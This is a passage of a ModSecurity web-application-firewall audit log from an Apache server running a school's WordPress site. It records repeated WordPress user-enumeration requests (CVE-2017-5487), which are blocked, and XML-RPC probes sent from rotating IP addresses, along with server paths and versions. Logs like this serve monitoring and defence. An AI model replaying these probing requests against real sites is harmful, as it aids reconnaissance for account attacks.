156.228.183.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6b3f520-C-- demo.sayHello --c6b3f520-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6b3f520-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450833370587 5758 (- - -) Stopwatch2: 1747450833370587 5758; combined=4177, p1=548, p2=3404, p3=33, p4=36, p5=93, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6b3f520-Z-- --74e7d133-A-- [17/May/2025:10:01:53 +0700] aCf8Iem4kjNN-hEbWjJDFQAAAEw 103.236.140.4 50694 103.236.140.4 8181 --74e7d133-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74e7d133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e7d133-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450913138874 3374 (- - -) Stopwatch2: 1747450913138874 3374; combined=1478, p1=491, p2=949, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e7d133-Z-- --d7326735-A-- [17/May/2025:10:01:57 +0700] aCf8JRKi5m5upc8uMd6jfQAAANc 103.236.140.4 50702 103.236.140.4 8181 --d7326735-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7326735-C-- demo.sayHello --d7326735-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7326735-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450917491908 5022 (- - -) Stopwatch2: 1747450917491908 5022; combined=3907, p1=464, p2=3236, p3=27, p4=24, p5=91, sr=67, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7326735-Z-- --7a9ea91e-A-- [17/May/2025:10:06:09 +0700] aCf9Iem4kjNN-hEbWjJDHAAAAEM 103.236.140.4 50728 103.236.140.4 8181 --7a9ea91e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a9ea91e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a9ea91e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451169083782 2832 (- - -) Stopwatch2: 1747451169083782 2832; combined=1240, p1=443, p2=767, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a9ea91e-Z-- --9862d13f-A-- [17/May/2025:10:06:19 +0700] aCf9KxKi5m5upc8uMd6jgQAAAMQ 103.236.140.4 50732 103.236.140.4 8181 --9862d13f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9862d13f-C-- demo.sayHello --9862d13f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9862d13f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451179755491 6677 (- - -) Stopwatch2: 1747451179755491 6677; combined=4833, p1=606, p2=3986, p3=39, p4=42, p5=96, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9862d13f-Z-- --8275012e-A-- [17/May/2025:10:08:41 +0700] aCf9uem4kjNN-hEbWjJDHwAAAEQ 103.236.140.4 50746 103.236.140.4 8181 --8275012e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8275012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8275012e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451321977868 2928 (- - -) Stopwatch2: 1747451321977868 2928; combined=1332, p1=465, p2=837, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8275012e-Z-- --ca080278-A-- [17/May/2025:10:08:48 +0700] aCf9wHyxdQCiyU1ENFcrhAAAAAc 103.236.140.4 50750 103.236.140.4 8181 --ca080278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca080278-C-- demo.sayHello --ca080278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca080278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451328391606 6558 (- - -) Stopwatch2: 1747451328391606 6558; combined=4682, p1=632, p2=3822, p3=45, p4=43, p5=85, sr=80, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca080278-Z-- --8932826e-A-- [17/May/2025:10:10:17 +0700] aCf-Gem4kjNN-hEbWjJDJQAAAE8 103.236.140.4 50768 103.236.140.4 8181 --8932826e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8932826e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8932826e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451417030366 3133 (- - -) Stopwatch2: 1747451417030366 3133; combined=1337, p1=429, p2=873, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8932826e-Z-- --edf4e85d-A-- [17/May/2025:10:10:25 +0700] aCf-Iem4kjNN-hEbWjJDJwAAAFM 103.236.140.4 50772 103.236.140.4 8181 --edf4e85d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --edf4e85d-C-- demo.sayHello --edf4e85d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --edf4e85d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451425815190 6524 (- - -) Stopwatch2: 1747451425815190 6524; combined=4690, p1=598, p2=3818, p3=40, p4=43, p5=126, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edf4e85d-Z-- --a942172d-A-- [17/May/2025:10:10:36 +0700] aCf-LOm4kjNN-hEbWjJDKgAAAFg 103.236.140.4 50780 103.236.140.4 8181 --a942172d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a942172d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a942172d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451436687191 2261 (- - -) Stopwatch2: 1747451436687191 2261; combined=1100, p1=380, p2=691, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a942172d-Z-- --fe9e897c-A-- [17/May/2025:10:10:42 +0700] aCf-Mum4kjNN-hEbWjJDKwAAAEM 103.236.140.4 50784 103.236.140.4 8181 --fe9e897c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe9e897c-C-- demo.sayHello --fe9e897c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9e897c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451442751113 5361 (- - -) Stopwatch2: 1747451442751113 5361; combined=4015, p1=525, p2=3272, p3=29, p4=31, p5=93, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9e897c-Z-- --471d3a4f-A-- [17/May/2025:10:13:26 +0700] aCf-1nyxdQCiyU1ENFcrhwAAAAs 103.236.140.4 50794 103.236.140.4 8181 --471d3a4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --471d3a4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471d3a4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451606277538 2965 (- - -) Stopwatch2: 1747451606277538 2965; combined=1278, p1=424, p2=819, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471d3a4f-Z-- --b0921709-A-- [17/May/2025:10:13:31 +0700] aCf-2-m4kjNN-hEbWjJDLwAAAEg 103.236.140.4 50798 103.236.140.4 8181 --b0921709-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0921709-C-- demo.sayHello --b0921709-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0921709-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451611479498 5286 (- - -) Stopwatch2: 1747451611479498 5286; combined=4007, p1=491, p2=3233, p3=93, p4=32, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0921709-Z-- --f7ec0304-A-- [17/May/2025:10:14:04 +0700] aCf-_Om4kjNN-hEbWjJDMQAAAEs 103.236.140.4 50802 103.236.140.4 8181 --f7ec0304-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f7ec0304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7ec0304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451644793831 12666 (- - -) Stopwatch2: 1747451644793831 12666; combined=20884, p1=451, p2=769, p3=0, p4=0, p5=9846, sr=77, sw=1, l=0, gc=9817 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7ec0304-Z-- --40604d7f-A-- [17/May/2025:10:14:11 +0700] aCf_A3yxdQCiyU1ENFcriAAAAAw 103.236.140.4 50806 103.236.140.4 8181 --40604d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --40604d7f-C-- demo.sayHello --40604d7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --40604d7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451651785784 4816 (- - -) Stopwatch2: 1747451651785784 4816; combined=3783, p1=470, p2=3000, p3=24, p4=26, p5=145, sr=69, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40604d7f-Z-- --f32dbd59-A-- [17/May/2025:10:20:40 +0700] aCgAiOm4kjNN-hEbWjJDOwAAAEg 103.236.140.4 50840 103.236.140.4 8181 --f32dbd59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f32dbd59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32dbd59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452040746480 2875 (- - -) Stopwatch2: 1747452040746480 2875; combined=1274, p1=425, p2=820, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32dbd59-Z-- --7d603f48-A-- [17/May/2025:10:20:47 +0700] aCgAj-m4kjNN-hEbWjJDPQAAAEs 103.236.140.4 50844 103.236.140.4 8181 --7d603f48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d603f48-C-- demo.sayHello --7d603f48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d603f48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452047191660 4549 (- - -) Stopwatch2: 1747452047191660 4549; combined=3566, p1=430, p2=2939, p3=23, p4=23, p5=88, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 